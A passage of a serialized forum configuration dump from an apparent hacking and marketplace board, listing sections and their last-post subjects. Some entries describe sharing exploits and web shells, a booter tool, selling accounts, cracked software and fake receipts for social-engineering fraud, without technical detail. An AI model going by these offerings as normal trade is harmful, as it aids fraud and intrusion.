CS5\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"1\";s:10:\"rulestitle\";s:11:\"Forum rules\";s:5:\"rules\";s:181:\"1. All downloads must contain a virus scan. 2. Program must not already be distributed in public forums on LH. 3. Download at your own risk! 4. This section is only for programs.\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"program_file1_4.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:84;a:37:{s:3:\"fid\";s:2:\"84\";s:4:\"name\";s:23:\"Other Premium Giveaways\";s:11:\"description\";s:120:\"This section for sharing exploits, VPNs, Shells etc. Anything that doesn\'t fall under the sections above belong in here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"31\";s:10:\"parentlist\";s:5:\"31,84\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"67\";s:15:\"lastpostsubject\";s:10:\"800 shells\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"treasure.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:33;a:37:{s:3:\"fid\";s:2:\"33\";s:4:\"name\";s:18:\"Graphics Help Desk\";s:11:\"description\";s:104:\"Need Help in creating an image? Stuck at a tutorial? Post your questions related graphics editing here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,33\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:30:\"Anyone have photoshop cracked?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:19:\"premium_support.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:34;a:37:{s:3:\"fid\";s:2:\"34\";s:4:\"name\";s:20:\"Tutorials and Guides\";s:11:\"description\";s:81:\"Post your tutorials and guides on how to use Photoshop, GIMP and other programs. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,34\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:79:\"???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"paint.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:63;a:37:{s:3:\"fid\";s:2:\"63\";s:4:\"name\";s:8:\"Requests\";s:11:\"description\";s:60:\"Need a signature, userbar, avatar or logo? Request em here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,63\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:10:\"Need a sig\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"gnome_applications_graphics.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:44;a:37:{s:3:\"fid\";s:2:\"44\";s:4:\"name\";s:17:\"Receipts and POPs\";s:11:\"description\";s:99:\"Need a fake receipt or proof of purchase to SE your next product/company? Post your requests here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,44\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"2\";s:15:\"lastpostsubject\";s:15:\"FIFA 13 Receipt\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:16:\"receipt-text.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:35;a:37:{s:3:\"fid\";s:2:\"35\";s:4:\"name\";s:16:\"Graphics Lounge \";s:11:\"description\";s:112:\"Show off with your creations, Create contests, ask off topic graphics related questions here (No support here). \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"32\";s:10:\"parentlist\";s:5:\"32,35\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:16:\"Rate these logos\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:15:\"Deviant_Art.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:37;a:37:{s:3:\"fid\";s:2:\"37\";s:4:\"name\";s:23:\"Marketplace Discussions\";s:11:\"description\";s:116:\"Looking for something to buy? Need to work out a price? Want to report a scammer? This is the right section for you.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,37\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"forum_32.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:39;a:37:{s:3:\"fid\";s:2:\"39\";s:4:\"name\";s:15:\"Premium Sellers\";s:11:\"description\";s:45:\"Only upgraded members can make threads here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,39\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:32:\"[Selling] Cheap Netflix Accounts\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:17:\"kim_yongii256.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:40;a:37:{s:3:\"fid\";s:2:\"40\";s:4:\"name\";s:17:\"Secondary Sellers\";s:11:\"description\";s:91:\"All members can make threads here. Please be extra careful with all deals in this section. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,40\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:20:\"emblem_handshake.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:41;a:37:{s:3:\"fid\";s:2:\"41\";s:4:\"name\";s:8:\"Auctions\";s:11:\"description\";s:64:\"This forum is for auctions. Please follow the forum guidelines. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,41\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"84\";s:15:\"lastpostsubject\";s:13:\"steam account\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"auction_hammer_gavel.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:38;a:37:{s:3:\"fid\";s:2:\"38\";s:4:\"name\";s:12:\"Scam Reports\";s:11:\"description\";s:67:\"Want to report a scammer? All scammer reports are to be made here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"37\";s:10:\"parentlist\";s:8:\"36,37,38\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:21:\"Filling a scam report\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"alert.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:69;a:37:{s:3:\"fid\";s:2:\"69\";s:4:\"name\";s:7:\"General\";s:11:\"description\";s:101:\"Discussions related to coding can be discussed here. Please do not post any tutorials in this forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,69\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"9\";s:15:\"lastpostsubject\";s:20:\"[Release] IP Manager\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"web_coding.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:52;a:37:{s:3:\"fid\";s:2:\"52\";s:4:\"name\";s:31:\"Visual Basic and .Net Framework\";s:11:\"description\";s:83:\"Visual Basic .NET is an Object-Oriented programming language designed by Microsoft.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,52\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:31:\"[Release]Skype Resolver & GeoIP\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:6:\"vb.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:53;a:37:{s:3:\"fid\";s:2:\"53\";s:4:\"name\";s:4:\"Java\";s:11:\"description\";s:172:\"Java allows you to play online games, chat with people around the world, calculate your mortgage interest, and a lot more. This is sun\'s most popular programming language. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,53\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"222\";s:15:\"lastpostsubject\";s:19:\"Complete Java Guide\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"java.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:67;a:37:{s:3:\"fid\";s:2:\"67\";s:4:\"name\";s:3:\"PHP\";s:11:\"description\";s:132:\"PHP is mainly used to define classes and functions and is the leading web programming language because of its strength & simplicity.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,67\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"67\";s:15:\"lastpostsubject\";s:26:\"Slowlowirs Shell .PHP file\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"application-x-php.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:68;a:37:{s:3:\"fid\";s:2:\"68\";s:4:\"name\";s:5:\"Other\";s:11:\"description\";s:75:\"Other coding discussions that don\'t have a forum should be discussed here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,68\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"8\";s:15:\"lastpostsubject\";s:18:\"Simple Perl Booter\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:17:\"media-scripts.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:58;a:37:{s:3:\"fid\";s:2:\"58\";s:4:\"name\";s:34:\"Group Recruitments and Discussions\";s:11:\"description\";s:132:\"For all topics regarding custom user groups such as recruitment, joining questions, and other threads about groups please post here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,58\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:54:\"The Marketers - Official Recruitment | Join us Today !\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:10:\"groups.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:61;a:37:{s:3:\"fid\";s:2:\"61\";s:4:\"name\";s:19:\"Unique Headquarters\";s:11:\"description\";s:29:\"Unique groups private forum. 